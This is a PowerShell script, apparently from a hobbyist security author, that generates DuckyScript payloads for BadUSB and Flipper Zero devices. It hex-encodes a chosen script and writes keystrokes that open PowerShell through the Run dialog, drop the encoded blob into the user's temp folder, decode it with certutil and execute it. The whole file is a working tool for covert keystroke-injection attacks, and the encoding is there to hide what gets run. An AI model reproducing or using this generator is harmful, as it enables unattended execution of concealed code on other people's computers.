# Title: REDD's Encoded Payload Generator
# Description: Creates a encrypted Payload for BadUSB/Duckyscript Devices.
# AUTHOR: InfoSecREDD
# Version: 1.5
$path = split-path -parent $MyInvocation.MyCommand.Definition
$script = $MyInvocation.MyCommand.Name
$payload_filename = "gen_payload.tmp"
$payload_file = "$path\$payload_filename"
$temp_file = "$path\temp.txt"
$final_file = "$path\payload.txt"
$argcheck = $args.Count
$flipper = 0
$IsFullPath = 0
Write-Host "`n`n   :::::::::  :::::::::: :::::::::  :::::::::  ::: ::::::::  `n   :+:    :+: :+:        :+:    :+: :+:    :+: :+ :+:    :+: `n   +:+    +:+ +:+        +:+    +:+ +:+    +:+    +:+        `n   +#++:++#:  +#++:++#   +#+    +:+ +#+    +:+    +#++:++#++ `n   +#+    +#+ +#+        +#+    +#+ +#+    +#+           +#+ `n   #+#    #+# #+#        #+#    #+# #+#    #+#    #+#    #+# `n   ###    ### ########## #########  #########      ######## `n`n              REDD's Encrypted Payload Generator`n"
if ( 0 -eq $argcheck )
{
  Write-Host "`nERROR: No arguments supplied to encode.`n`nSyntax: $script `<File_to_Encode`>`n        $script `<File_to_Encode`> -flipper`n`n"
  exit
}
if (Test-Path "$temp_file") {
  Remove-Item "$temp_file" >$null 2>&1
}
if ( 1 -eq $argcheck )
{
  $argpath = Get-ChildItem "$args" | Select-Object -ExpandProperty FullName
  if ("$args" -eq "$argpath") {
     if (Test-Path "$args")  {
        certutil -encodehex -f "$argpath" "$temp_file" 0x40000001 >$null 2>&1
     }
  }
  elseif (Test-Path "$path\$args")  {
     certutil -encodehex -f "$path\$args" "$temp_file" 0x40000001 >$null 2>&1
  }
  else {
     Write-Host "`nERROR: No file named $args in $path.`n`n"
     exit
  }
}
elseif ( 2 -ge $argcheck ) 
{
  $showfile = $args[0]
  $argpath = Get-ChildItem $showfile | Select-Object -ExpandProperty FullName
  if ("$showfile" -eq "$argpath") {
	$IsFullPath = 1
  }
  if ("$IsFullPath" -ne "1") {
     if (!(Test-Path "$path\$showfile")) {
        Write-Host "`nERROR: No file named $showfile in $path.`n`n"
        exit
     }
  }
  if ( $args[1] -eq "-flipper" -Or $args[1] -eq "-badusb" )
  {
     Write-Host "Creating $payload_filename for Flipper Zero BadUSB Compatiblity."
     $flipper = 1
     certutil -encodehex -f "$argpath" "$temp_file" 0x40000001 >$null 2>&1
  } 
  else {
	 $showargs = $args[1]
     Write-Host "ERROR: Arugment `'$showargs`' is not valid. Please try again.`n"
     exit
  }
}
else
{
  Write-Host "Arguments are not valid. Please Try again.`n"
}
$output = Get-Content "$temp_file" | Out-String
$output = $output.replace("`r`n", "")
Remove-Item "$temp_file" >$null 2>&1
if (Test-Path "$payload_file") {
  Remove-Item "$payload_file" >$null 2>&1
  New-Item -Name "$payload_filename" -ItemType File >$null 2>&1
}
else {
  New-Item -Name "$payload_filename" -ItemType File >$null 2>&1
}

"REM Title      :" | Out-File -FilePath "$payload_file" -Append
"REM Description:" | Out-File -FilePath "$payload_file" -Append
"REM Author     :" | Out-File -FilePath "$payload_file" -Append
"REM Version    :" | Out-File -FilePath "$payload_file" -Append
"REM Generated by REDD's Encoded Payload Generator" | Out-File -FilePath "$payload_file" -Append
"REM - It is highly suggested you adjust the DELAYS for your use." | Out-File -FilePath "$payload_file" -Append
if ( 1 -ne $flipper )
{
  "DUCKY_LANG US" | Out-File -FilePath "$payload_file" -Append
}
else
{
  Write-Host "--> Skipping DUCKY_LANG String for Flipper Compatibility."
}
"DELAY 2000" | Out-File -FilePath "$payload_file" -Append
"GUI r" | Out-File -FilePath "$payload_file" -Append
"DELAY 200" | Out-File -FilePath "$payload_file" -Append
"STRING powershell" | Out-File -FilePath "$payload_file" -Append
"DELAY 500" | Out-File -FilePath "$payload_file" -Append
"ENTER" | Out-File -FilePath "$payload_file" -Append
if ( 1 -ne $flipper )
{
  "DELAY 500" | Out-File -FilePath "$payload_file" -Append
}
else
{
  Write-Host "--> Adding extra DELAY for Flipper Compatibility."
  "DELAY 2000" | Out-File -FilePath "$payload_file" -Append
}
"STRING `$TempFile = `"`$env:TEMP\temp.ps1`"; `$File = `"`$env:TEMP\l.ps1`"; echo $output `> `"`$TempFile`"; certutil -f -decode `"`$TempFile`" `"`$File`" `| out-null`; `& `"`$env:TEMP\l.ps1`"" | Out-File -FilePath "$payload_file" -Append
"DELAY 1000" | Out-File -FilePath "$payload_file" -Append
"ENTER" | Out-File -FilePath "$payload_file" -Append
Get-Content "$payload_file" | out-file -encoding ASCII "$final_file"
Remove-Item "$payload_file" >$null 2>&1
Write-Host "`nPayload Generation Complete.`n`n  Location: $final_file`n`n"
